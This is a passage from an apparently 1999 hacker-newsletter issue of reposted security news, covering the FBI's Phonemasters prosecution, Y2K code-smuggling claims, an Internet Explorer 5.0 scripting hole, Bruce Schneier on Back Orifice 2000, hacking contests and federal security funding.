downloaded about 850 Sprint calling-card codes. He then transferred those codes to a man in
Canada. The codes would allow anyone who purchased them to place free international phone
calls. Morris would later learn that a contact in Canada paid Cantrell $2 apiece for each code,
court records show. The Phonemasters most likely did not know -- or care -- where the codes
ended up, but the FBI traced them and found some ended up in the hands of a Sicilian Mafia
operative in Switzerland.
On Jan. 23, while probing a U S West telephone database, Cantrell, Bosanac, Lindsley and
others stumbled over a list of telephone lines that were being monitored by law enforcement. On a
lark, they decided to call one of the people -- a suspected drug dealer, says Morris -- and let him
know his pager was being traced by the police.
On Jan. 27, the group was clearly feeling paranoia about being caught, prompting Lindsley to tell
his accomplices to pull as many Sprint codes as quickly as they could. Cantrell began to have
reservations.
"What if I stopped before all of y'all?" Cantrell asked Lindsley. "Would you applaud my efforts?"
"No," said Lindsley. "I don't think there's any reason to stop. What are you worried about?"
"Uh, I'm not worried about anything. I'm just saying, uhm. There might ... there might come a time
here where I don't have time for this."
He added a little later: "I, you know, really like it. But, I don't know, I just ... Eventually, I don't
see myself doing a lot of illegal things."
Lindsley continued to prod Cantrell to speed up the download of stolen codes by spending more
time online and using two phones.
"I'm telling you, you run two lines around the clock," Lindsley said.
"You can't run them around the clock," said Cantrell.
"Why not?"
"Oh, come on. I think that's pushing it too hard."
"I think you just got a weak stomach there, boy."
Tension rises
By late February, things began to get tense. One of Cantrell's hacker friends informed him that his
number had shown up in a database of phone numbers being monitored by the FBI. In all the
excitement of burglarizing databases and rerouting phone calls, the Phonemasters had neglected to
check their own phone lines for any signs that law enforcement might be listening in.
Morris hastily arranged for an FBI raid. On Feb. 22, 1995, agents raided
Cantrell's home, Lindsley's college dorm room, and burst into Bosanac's
bedroom in San Diego.
For Morris, the climactic raid was only the start of a long battle to bring the
hackers to justice. Because of the complicated nature of his evidence
gathering, it took him more than two years to compile the most salient
portions of the wiretap transcripts and data-tap evidence. "All the documents
and tapes from this case could fill a 20-by-20 room," Morris explains. "And
at the time, I was the only computer investigator for all of Texas."
In the meantime, as federal prosecutors slowly geared up for a trial, Cantrell
tried to get on with his life. "I spent the first few weeks after the raid being
paranoid and wondering what would happen," he says. Occasionally, Morris and other agents
would call him, asking questions about some of the systems he had hacked. By the summer of
1995, at the urging of his mother, Cantrell started attending church again. He scored the first in a
string of professional computing jobs, doing systems-administration work for a company called
Lee Datamail in Dallas. He neglected to tell his employers about the FBI case. "It's been mental
torture for the last four years, not knowing," says Cantrell. "Can I go to school, move to another
state? That kind of thing messes with your head."
Over time, Cantrell says he had come to seriously regret what he had done and the $9,000 he
says he made from selling codes wasn't worth the trouble. "Looking back, it was all crazy. It was
an obsession. I wanted to see how much I could conquer and a little power went to my head."
Cantrell notes that he has since tried to make amends, even helping the phone companies plug
their security holes and helping the FBI gather more information on some of the group's members
who haven't yet been apprehended.
The matter finally seemed near conclusion this March when Morris was able to play "a couple of
choice tapes" in separate meetings with Cantrell, Bosanac and Lindsley. Afterward, all three
agreed to plea guilty to federal charges of one count of theft and possession of unauthorized
calling-card numbers and one count of unauthorized access to computer systems. Chief Judge
Jerry Buchmeyer ordered a presentencing investigation.
During a hearing on the matter, Lindsley's attorney tried to argue that the FBI had wildly
overstated the $1.85 million in losses that her client's hacking had allegedly caused. But in the end,
Judge Buchmeyer rejected the argument and sentenced him to 41 months in prison. Bosanac, in
the meantime, has asked that his sentencing hearing be moved to San Diego, where he lives.
As for Cantrell, Judge Buchmeyer lauded his "acceptance of guilt." He could have been sentenced
to three years in federal prison; instead he was given two. He reports to federal prison in January
of next year.
Morris, meanwhile, has used his data-tap method in several other cases; he also travels around the
country and the world advising law-enforcement agencies on how to conduct state-of-the-art
investigations of hacker crimes.
@HWA
52.0 INDIA RESPONDS TO Y2K ACCUSATIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 2:45 pm CET
Indian firms have done more than $2 billion worth of coding work to protect old
computers from the Y2K problem, but accusations are made by some that India and
Israel appear to be the "most likely sources" of malicious code. Indian officials
yesterday reacted to these claims speaking of it as a ridiculous suggestion. Indian
reaction
http://www.wired.com/news/news/politics/story/22041.html
India: Code-Smuggling? Absurd
Reuters
11:45 a.m. 1.Oct.99.PDT
Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to
smuggle in computer codes aimed at threatening Washington's security.
Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K
modifications had begun to surface in some US work undertaken by foreign contractors.
The claim signaled possible economic and security threats.
Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer
assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code.
The article appeared in the June issue of Infrastructure Protection Digest.
"I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the
Indian government's Y2K Action Force.
"I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement,"
Ahluwalia told Reuters.
He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies.
The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully
can be useful to people."
Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two
digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns.
India and Israel have had differences with the United States on security matters, particularly on nuclear policy.
Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss
suggestions Indian firms may be a security threat.
He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients.
Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added.
"We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said.
He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in
client systems.
Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road.
This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of
data, he said.
Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term
consequences of using foreign firms for Y2K work could include more espionage and reduced information security.
Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions.
"I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to
happen," he said. We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors."
Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm
US systems but did not rule out threat possibilities.
Copyright 1999 Reuters Limited.
@HWA
53.0 ANOTHER IE 5.0 HOLE EXPOSED
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 10:20 am CET
O swell, here's another Internet Explorer hole for you. The latest problem can occur
through a download file link in HTML. The bogus link can open a path to your
computer. This bug also bypasses firewalls to access PCs. Once again, turn of the
scripting people! ZDNet report on it
http://www.zdnet.com/zdnn/stories/news/0,4586,2344472,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
IE 5.0 security hole exposed
By Peter Deegan, Help Channel
September 30, 1999 8:02 AM PT
URL: http://www.newslinx.com/
Every time you look there's another security breach found in Microsoft Internet Explorer 5.0. Like
many of these problems there are no reports of it being used maliciously yet, but now that the
details are out, the chances of someone making use of the information grows.
This latest problem can occur through what appears to be a download file link on a Web page,
newsgroup message or HTML e-mail message. The bogus download link can open a path to your
computer, through which it's possible to read files on your computer. You don't need to click on
the link to be affected because it possible to automatically activate the link when you view the
Web page or e-mail message.
The problem is in the Active Scripting component of Microsoft (Nasdaq:MSFT) Internet Explorer
5. Working behind a corporate firewall or proxy is no protection from this security hole.
What can you do about it?
There's no patch available for the problem, though Microsoft has issued a security alert and is
working on the problem now. In the meantime you can protect yourself by switching off the Active
Scripting component. In Internet Explorer 5, select Tools | Internet Options, then click on the
Security tab. Select the Internet Zone, then click on the "Custom Level" button. Scroll down to the
"Scripting" heading, find the "Active Scripting" entry and change it to "Disable." Click OK.
Keep in mind, this temporary fix may do you more harm than good.
Scripting is used by many Web sites, and it's possible that some service
on a Web page won't work once you turn scripting off. The best
example of this is the Windows Update option in IE5 itself; this is the easiest way to update the
browser with security patches and other new features. So if you turn off Scripting in IE5 you won't
be able to use the Windows option to get the update to fix Scripting. Catch 22!
You could change the Scripting setting to "Prompt," which means you'll get a warning when you go
to a Web page that has a scripting component. The problem with this is that the prompt gives you
no indication of what the scripting will do so you're asked to make a decision with no information.
While the risk in the short term of this problem is relatively low, you can switch off scripting if
you're concerned -- but keep in mind the consequences. Remember to turn scripting back on
when using Tools | Windows Update to check for an update. Let's hope the security patch for this
problem arrives soon.
@HWA
54.0 TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:50 am CET
Key members of the U.S. telecommunications industry complained this week that a
government deadline for compliance with a new digital wiretapping law is "unrealistic."
Matthew Flanigan, president of the Telecommunications Industry Association (TIA),
warned that "Calea compliance involves one of the most complicated sets of features
ever developed by manufacturers." To comply, Flanigan said, manufacturers must
develop software interfaces for hundreds of network elements without bringing down
telecom networks. Full story
http://www.eet.com/story/OEG19990929S0022
Telecom industry decries digital wiretap deadline
By George Leopold
EE Times
(09/29/99, 2:24 p.m. EDT)
WASHINGTON Key members of the U.S. telecommunications industry complained this week that a
government deadline for compliance with a new digital wiretapping law is "unrealistic."
While praising the Federal Communications Commission (FCC) for finally issuing guidelines to implement the
controversial wiretap law the Communications Assistance for Law Enforcement Act (Calea) a trade group
here charged with developing standards said a Sept. 30, 2001, deadline for compliance is too soon.
Matthew Flanigan, president of the Telecommunications Industry Association (TIA), warned that "Calea
compliance involves one of the most complicated sets of features ever developed by manufacturers." The FCC
decision "will only add to the complexity and difficulty," he said.
To comply, Flanigan said, manufacturers must develop software interfaces for hundreds of network elements
without bringing down telecom networks.
In issuing its final order earlier this week, the FCC designated the industry group as the standards-setting body
for converting myriad legal decisions about the wiretap law into technical standards needed by manufacturers to
comply with the 1994 law.
@HWA
55.0 FED COMPUTER SECURITY BILL HAS STRONG SUPPORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:25 am CET
A house bill aimed at beefing up computer security in civilian federal agencies
received a broad endorsement from government and high-tech industry leaders today.
Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide
much needed security guidance to non-military federal agencies, it could help beef-up
private-sector computer security by providing the public with a list of
government-approved security devices, National Institute of Standards and
Technology (NIST) Director Raymond Kammer said yesterday. The legislation
appears to have strong support in the Subcommittee on Technology after a hearing on
the matter yesterday. Newsbytes
http://www.newsbytes.com/pubNews/99/137105.html
Fed Computer Security Bill Has Strong Support
By David McGuire, Newsbytes
WASHINGTON, DC, U.S.A.,
30 Sep 1999, 3:56 PM CST
A house bill aimed at beefing up computer security in civilian federal agencies received a broad
endorsement from government and high-tech industry leaders today.
Not only would H.R. 2413, The Computer Security Enhancement Act of 1999, provide much needed security guidance to
non-military federal agencies, it could help beef-up private-sector computer security by providing the public with a list of
government-approved security devices, National Institute of Standards and Technology (NIST) Director Raymond Kammer
said today.
Kammer spoke at a hearing on H.R. 2413 held by the House Science Committee's Subcommittee on Technology.
The legislation appears to have strong support in the Subcommittee.
"Despite the money, manpower and management priority we've exerted on the Y2K problem, I believe a lack of adequate
computer security protection in our federal agencies has the potential to dwarf the millennium bug in scope and magnitude,"
Subcommittee Chairwoman Constance Morella, R-Md., said in prepared remarks today.
Among other things, H.R. 2413 would require NIST to serve as a computer security consultant for other federal agencies. In
that role NIST would advise agencies on what "off-the-shelf" computer security products met with the government's approval.
NIST would provide that list of approved products to the public as well.
The bill also requires the Under Secretary of Commerce to establish a "clearinghouse of information" on computer security
threats and to make that list available to the public.
If passed, the bill will "get civilian agencies to pay more attention to information security," said Information Technology
Association of America President Harris Miller after today's hearing.
In addition to its computer security provisions, the bill also establishes a new, NIST-administered computer science
fellowship program for students studying computer security.
Reported by Newsbytes.com, http://www.newsbytes.com .
15:56 CST
@HWA
56.0 JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:15 am CET
In March, Cybercitizen Partnership was announced, an awareness campaign
coordinated by the Information Technology Association of America. The US Justice
Department will provide $300,000 funding of the Cybercitizen Partnership and so,
according to this article, will assume the unusual role of helping to educate budding
Web users about how to be responsible, law-abiding surfers. Haleluja
http://www.thestandard.net/articles/display/0,1449,6711,00.html?home.tf
Justice Dept. Funds
Antihacking Campaign
By Keith Perine
WASHINGTON The Justice Department is
trying to save children before they turn into
hackers.
With its $300,000 funding of the
Cybercitizen Partnership, an awareness
campaign coordinated by the Information
Technology Association of America, the
Justice Department assumes the unusual role
of helping to educate budding Web users
about how to be responsible, law-abiding
surfers.
The Cybercitizen Partnership, announced in
March, is a joint Justice-ITAA effort aimed
at protecting the country's Internet
infrastructure from outlaw hackers and other
criminals. Faced with a security breach, law
enforcement officials don't know at first if
they're confronting a foreign terrorist, a
college student or a couple of sixth-graders
who are having some fun with Dad's
computer. But an ITAA official said that,
upon investigation, a surprising number of
cases involve child hackers.
The association says that information
technology makes up about 6 percent of the
global gross domestic product some $1.8
trillion of electronic infrastructure that needs
to be protected against disgruntled former
employees, corporate spies and juvenile
delinquents who like to pull pranks.
Figuring that it's too late to reform terrorists
and spies, the ITAA decided to concentrate
on the kids. The campaign, which debuts in
January, will initially target children 12 and
under, aiming to teach them proper online
behavior and to instill a healthy disdain for
hacking. The association wants to "help
weed out some of the less meaningful
system violations by curious children so that
law enforcement can focus on the true
criminals," says ITAA President Harris Miller.
The cash infusion from the Justice
Department is in keeping with a long
tradition of government-sponsored public
education campaigns, from the Interior
Department's Smokey the Bear messages
against forest fires to the Drug Enforcement
Administration's "Just Say No" war on drugs.
Miller says the campaign could be expanded
to educate kids about other aspects of
proper Internet etiquette, such as warning
them against sending spam for kids, the
modern-day equivalent of prank telephone
calls or visiting Web sites with adult
content. The main focus of the campaign,
however, will be to "send the message that
hacking isn't cute, clever or funny." In
addition to the funding from Justice, the
ITAA also plans to pass the hat among its
own membership, a who's-who list of the
high-tech industry that includes Microsoft
(MSFT) , America Online (AOL) and IBM
(IBM) . The association will also seek funds
from foundations and possibly from private
individuals.
The association has sent out a request to
several public relations companies for ideas
on how to run the campaign, which might
include television and Internet advertising,
brochures and even visits to schools. One
possibility under consideration: the creation
of a mascot, like the famous McGruff crime dog, to pass the message
along in a friendly manner.
@HWA
57.0 COURT TO REVISIT CRYPTO RULING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 9:01 am CET
A U.S. federal appeals court will reexamine a trial court's decision to lift U.S.
government restrictions on the export of encryption technology. The 9th U.S. Circuit
Court of Appeals withdrew a May decision by a panel of three of its judges, which had
endorsed the trial court ruling. In May, the panel of 9th Circuit judges concluded that
the federal government could not limit professor Daniel J. Bernstein's efforts to
distribute encryption software. Read more
http://news.cnet.com/news/0-1005-200-424043.html?tag=st.ne.1002.bgif.1005-200-424043
Court to revisit encryption ruling
By Bloomberg News
Special to CNET News.com
September 30, 1999, 1:30 p.m. PT
SAN FRANCISCO--A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government
restrictions on the export of encryption technology.
The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court
ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption
issue is significant enough to be revisited.
In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts
to distribute encryption software.
Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology
overseas.
Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing
the way for Network Associates and other companies to sell the hardest-to-crack encryption technology.
Copyright 1999, Bloomberg L.P. All Rights Reserved.
@HWA
58.0 DRAM ROBBERIES
~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Friday 1st October 1999 on 8:40 am CET
Dane-Elec (UK) warned fellow memory distributors to keep DRAM under surveillance
following a robbery at their warehouse. The Surrey-based distributor said it was
broken into at 2am yesterday morning. But the robbers were disturbed by a security
guard and got away with less kit than they intended. 128MB and 64MB modules were
stolen. Though the value wasn't disclosed, the company said it was small, and less
than a tenth of the companys stock. Word on the street is that this could be
anything between £1 million and £3 million. The Register
http://www.theregister.co.uk/
@HWA
59.0 DON'T BLAME BO FOR SECURITY PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Thursday 30th September 1999 on 9:30 am CET
CNN spoke to Bruce Schneier about the BackOrifice remote administration tool.
According to him, "Back Orifice will be used by lots of unethical people to do all sorts
of unethical things, which is not good." But he also mentions some other things
people should take to heart, programs as pcanywhere are as much "evil hacking
tools" as BO. Microsoft responds to security threats only if they are demonstrated.
Explain the threat in an academic paper and Microsoft denies it; release a hacking
tool like Back Orifice and suddenly they take the vulnerability seriously. CNN
http://cnn.com/TECH/computing/9909/29/back.orifice.idg/index.html
Don't blame Back Orifice for
security problems
September 29, 1999
Web posted at: 10:50 a.m. EDT (1450 GMT)
by Ann Harrison
(IDG) -- BackOrifice is a remote
administration tool for Microsoft
Windows and, as Bruce Schneier, chief
technology officer at San Jose-based
managed security services firm
Counterpane Internet Security Inc. (link
below), points out, "one of the coolest
hacking tools ever developed."
Computerworld reporter Ann Harrison spoke with him recently about the tool,
which he insists has gotten an undeservedly bad reputation.
Back Orifice 2000 (BO2K) is free, open source and available at
www.bo2k.com (link below).
Q: How does BO2K work?
A: There are two parts: a client and a server. The server is installed on the
target machine. The client, residing on another machine anywhere on the
Internet, can now take control of the server.
This is actually a legitimate requirement.
Perfectly respectable programs, like
pcAnywhere or Microsoft Systems
Management Server [SMS], do the same
thing. They allow a network administrator to
remotely troubleshoot a computer. If the
server is installed on a computer without the
knowledge or consent of its owner, the client
can effectively "own" the victim's PC.
Q: Why has BO2K acquired a reputation
as only a hacker's tool?
A: Back Orifice's difference is primarily
marketing spin. Since it was written by
hackers, it is evil.
That's wrong; pcAnywhere is just as much
an evil hacking tool as Back Orifice.
Not only can the client perform normal
administration functions on the server's
computer -- upload and download files, delete files, run programs, change
configurations, take control of the keyboard and mouse, see whatever is on the
server's screen -- but it can also do more subversive things: reboot the
computer, display arbitrary dialog boxes, turn the microphone or camera on
and off, capture keystrokes and passwords. And there is an extensible plug-in
language for others to write modules.
Q: How does BO2K run in stealth mode?
A: Unless the server's owner is knowledgeable (and suspicious), he will never
know that Back Orifice is running on his computer.
Other remote administration tools, even SMS, also have stealth modes. Back
Orifice is just better at it.
Because Back Orifice is configurable, because it can be downloaded in source
form and then recompiled to look different... I doubt that all variants will ever
be discovered.
BO2K's slogan is "show some control," and many will take that imperative
seriously. Back Orifice will be used by lots of unethical people to do all sorts
of unethical things. And that's not good.
Q: Back Orifice can't do anything until the server portion is installed
on some victim's computer, right?
A: Yes. This means that the victim has to commit a security faux pas before
anything else can happen. Not that this is very hard -- lots of people network
their computers to the Internet without adequate protection.
Still, if the victim is sufficiently vigilant, he can never be attacked by Back
Orifice.
Q: What about Microsoft?
A: One of the reasons Back Orifice is so nasty is that Microsoft doesn't
design its operating systems to be secure. It never has.
In Unix, an attacker would first have to get root privileges. Not in Windows.
There's no such thing as limited privileges or administrator privileges or root
privileges. This might have made some sense in the age of isolated desktop
computers. But on the Internet, this is absurd.
There are provisions to make Windows NT a very secure operating system,
such as privilege levels in separate user accounts, file permissions and kernel
object access control lists.
You have to make 300-plus security checks and modifications to Windows NT
to make it secure. Microsoft refuses to ship the [operating system] in that
condition.
Malicious remote administration tools are a major security risk. What Back
Orifice has done is made mainstream computer users aware of the danger.
There are certainly other similar tools in thehacker world -- one, called
BackDoor-G, has recently been discovered -- some developed with much
more sinister purposes in mind.
Microsoft responds to security threats only if they are demonstrated. Explain
the threat in an academic paper and Microsoft denies it; release a hacking tool
like Back Orifice and suddenly they take the vulnerability seriously.
@HWA
60.0 WHY HACKING CONTESTS ARE A BAD IDEA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Thursday 30th September 1999 on 9:15 am CET
Ira Winkler responds in a commentary to the new trend to test an OS by encouraging
people to hack into it. A nice overview of the "don'ts" and inaccuracy of such a
manner of testing. Read more
HTTP://www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2343174,00.html?chkpt=zdnnp1ms
Why Hacking Contests Are
a Bad Idea
Contests that encourage people to
hack are not a good way to test an OS.
By Ira Winkler October 4, 1999
When ZDTV informed me of a hacker
contest being sponsored by PC Week, I
thought it was a joke. Yet after visiting
the site, I'm not laughing. There are so
many reasons why this test is a bad idea.
Many people, however, might think that a
hacker contest is the only way to
thoroughly check the security of a
system.
The logic, as
stated on the
PC Week
website, was to
definitively
determine which
of the two
operating
systems is more
secure: Windows NT or Unix. According to
the stated logic, there is no better way to
determine security than by having
everyone in the world try to break into
the systems. Of course, the less secure
system would fall first. To make sure that
PC Week attracted the best talent in the
world to take part in this test, the
contest organizers offered a $1,000
reward. To a layperson, this may make
sense.
There is much more to security than just
the operating system. There are two
basic methods for breaking into a
computer.
1.Exploit problems built into the
underlying operating system and
applications.
2.Exploit problems with the way that
administrators and users configure,
manage, and use the system.
To first assume that hacking tests are
valid, the systems must be configured
perfectly. That in itself is asking a lot.
In Search of Security
Then you have to assume that the
applications that were used to provide the
Web functionality are also secure. After
all, you are asking to decide if Windows
NT is a good platform-- not if Windows NT
with a specific Web server application is
secure. If there is an exploitation that
compromises the server application, it
doesn't mean that the operating system is
the problem.
The next problem is with the Unix/Linux
side of the test. There are many different
versions of Unix and Linux. Just because
there might be a weakness in Red Hat
Linux, for example, doesn't mean that all
other versions of Linux have that
weakness.
Next you have to look at the goal of the
test. If the goal is to have someone break
into a site and manipulate the webpages,
that is one issue. But what happens if
someone takes the system down? A Denial
of Service attack could be more
devastating than if someone actually
broke in and modified webpages. In theory
a person who has broken into a system
can do both, however taking a system
down is bad enough.
Probably what is most surprising is that
the PC Week Linux system was "hacked"
first. According to the rules of the "test,"
this means that Windows NT is more
secure than Linux. I don't know any
security professional who would buy that
argument. And I doubt that Microsoft will
now start telling people that NT is more
secure than Linux, based on this "test."
There are many other reasons, from a
technical perspective, as to why this is a
bad test. However I should reserve some
space for the logistical perspective of
using "hackers" to test security.
Eyes on the Prize
Although the contest organizers at PC
Week probably believe that $1,000 is
enough to attract the attention of the
best hackers in the world, $1,000 is not
nearly enough to attract the attention of
the more competent hackers. Talented
security people, whom PC Week expects
to attract to the test, can earn as much
as $2,000 a day in consulting rates.
Additionally there have been other "hacker
challenges." These challenges were set up
in an unrealistic manner, and the way to
collect the "prize" required more effort
than it was worth. Past hacker challenges
have discouraged the better hackers.
Another issue is that you have to assume
that everyone has heard about this test.
Although there may have been some talk
about the challenge on some online
forums, this test has definitely not made
the rounds.
Probably the most serious of the problems
is that there is no right way to define
"The Most Secure Operating System."
However, the most agreed-upon way to
examine security is by looking at the
source code of the operating system.
Microsoft is not about to divulge the
source code to PC Week for a detailed
examination of Windows NT security.
So, what is the most secure operating
system? It is simply the system that you
can maintain best. Even if you could
identify the most secure operating
system, it will only be secure as long as it
is properly configured, maintained, and
used.
Therefore, the most potentially secure
operating system is the one that you
know best. For example, if your
organization has administrators who are
real NT experts, you would be a fool to
use an unfamiliar operating system for no
other reason than you think it is more
secure. Likewise, people would be fools to
turn away from Linux, because it was the
first system hacked in the PC Week test.
I have seen very secure NT websites,
because they were well maintained. I
have also seen very unsecure NT
websites because they were poorly
maintained. PC Week would better serve
its readers by testing administrator
training programs rather than operating
systems.
Postscript
As the PC Week security test progresses,
it continues to show why the test isn't
the greatest idea. First there is an issue
that I didn't want to point out in the
original column.
About a year ago, I helped
ComputerWorld organize a test of
firewalls that would have been similar in
nature to this hacker challenge. One of
the first issues we considered was that if
we opened up the test to everyone,
people might get bored with hacking the
test system and turn their attention to
ComputerWorld's operating systems.
The people at ComputerWorld decided
that this was a very real threat and
decided against an open challenge.
Now, a series of posts on the PC Week
Security Forum openly recommend or
encourage the hacking of the
Ziff-Davis-owned site as an extension of
this test. Whether or not people actually
go after the Ziff-Davis site is one story,
but a little forethought would have been
wise.
The second issue to consider is what as I
stated in the original column, the system
must be configured securely by the
administrators before a test can be
deemed valid. It appears that the Linux
hack was a result of a cgi scripting
program as well as an unapplied patch (or
security fix). Both of these are
configuration issues and the result of
administration practices, not the
underlying software. Again I would
recommend that administrator training
programs be tested, if you want a really
useful security-related test.
@HWA
61.0 NO $35 MILLION FOR DOE CYBER SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:55 pm CET
The Senate yesterday passed an energy appropriations bill that omits $35 million
requested by Energy Secretary Bill Richardson for increased computer security.
Richardson, traveling overseas, issued a statement charging that Congress was
withholding "important tools needed to implement security reform" that Congress
itself had demanded and that now "it will be impossible to provide real-time cyber
intrusion detection and protection for 70 Energy Department sites." Newsbytes
http://www.newsbytes.com/pubNews/99/137008.html
DOE Loses $35 Million for Cyber Security
By Walter Pincus and Vernon Loeb, Washington Post
WASHINGTON DC, U.S.A.,
29 Sep 1999, 9:03 AM CST
The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy
Secretary Bill Richardson for increased computer security. The money was eliminated despite months of
heated debate over suspected Chinese espionage, during which leading Republicans accused the Clinton
administration of foot-dragging on security.
Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to
implement security reform" that Congress itself had demanded.
Without the $35 million, Richardson said, "it will be impossible to provide real-time cyber intrusion detection and protection
for 70 Energy Department sites."
The money was eliminated by a House-Senate conference reconciling differences between the initial versions of the bill
passed by the two chambers. A member of the conference committee, who requested anonymity, said the $35 million was
eliminated because members "want to see management reform" before they approve a huge funding increase.
The committee member noted that Richardson is developing a $450 million cyber security proposal for fiscal 2001. It would
include money to replace all personal computers used in classified programs with machines that do not have floppy disk
drives, and thus cannot easily be downloaded.
Congress's action leaves the department with the $2 million it originally sought for computer security before suspected
Chinese espionage came to dominate political debate in Washington last spring.
Cyber security, in particular, became a major concern after it was discovered that the government's prime espionage
suspect at the Los Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had downloaded classified
information to his unclassified computer. Lee, who denies passing secrets to China, was fired but has not been charged
with any crime.
Meanwhile, the Energy Department's director of counterintelligence, Edward J. Curran, acknowledged yesterday that he
recommended his brother, a retired police detective, for a $70-an-hour temporary job reviewing counterintelligence
operations at the department's three nuclear weapons laboratories.
But he said the department's inspector general determined that his recommendation did not violate federal
conflict-of-interest statutes. "I recommended my brother, yes, but he does not work directly for me," Curran said.
Michael Curran, a veteran of 27 years as a detective for the Waterfront Commission of New York Harbor, has participated in
a two-week counterintelligence inspection at Lawrence Livermore Laboratory National Laboratory in California and is now
part of a nine-member team reviewing security at the Los Alamos lab in New Mexico.
All told, he will work about six weeks this fall, Edward Curran said, and will participate in additional counterintelligence
inspections at Energy Department facilities next year.
Reported by Newbsytes.com, http://www.newsbytes.com
09:03 CST
Reposted 11:14 CST
@HWA
62.0 DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:35 pm CET
The Defense Department donated or sold hundreds of thousands of computers,
medical devices and other electronic equipment to state and local agencies, hospitals
and other public institutions that could fail to operate because of Year 2000 problems.
The medical property included devices critical to health and safety, such as
anesthesia apparatus, fetal heart monitors and X-ray equipment. Read more
http://www.fcw.com/pubs/fcw/1999/0927/web-dod-09-28-99.html
SEPTEMBER 28, 1999 . . . 16:54 EDT
DOD resold non-Y2K compliant computers,
medical devices
BY DANIEL VERTON (dan_verton@fcw.com)
The Defense Department donated or sold hundreds of thousands of
computers, medical devices and other electronic equipment to state and local
agencies, hospitals and other public institutions that could fail to operate because
of Year 2000 problems.
In a report released this week, the Pentagon's inspector general found that
many of the 340,000 excess medical devices and 77,900 excess computer
systems donated or sold by DOD between Oct. 1, 1998, and March 31, 1999,
may not have been Year 2000-compliant and could fail to operate properly after
Dec. 31.
"The medical property included devices critical to health and safety, such as
anesthesia apparatus, fetal heart monitors and X-ray equipment," the report
stated. However, auditors admitted that the list of 340,000 medical devices also
included many items that are not deemed critical to public health and safety and
do not rely on date-dependent computer microchips.
In one case, the Naval Medical Center in Portsmouth, Va., transferred 9,000
pieces of equipment to the Defense Reutilization and Marketing Service -- the
DOD agency responsible for disbursing equipment that is no longer needed --
for sale or donation to other institutions without assessing any of them for
potential Year 2000 problems.
In fact, of the 9,000 items cited, 2,000 posed a high or medium health risk, the
report stated. According to the IG, plans called for these items to be transferred
or sold to the DOD Humanitarian Assistance Program, the Indian Health
Service, state and local agencies and the general public.
In addition to medical devices, the Defense Information Systems Agency and
the Defense Logistics Agency sold or donated more than 77,900 pieces of
computer equipment to various federal, state and local law enforcement
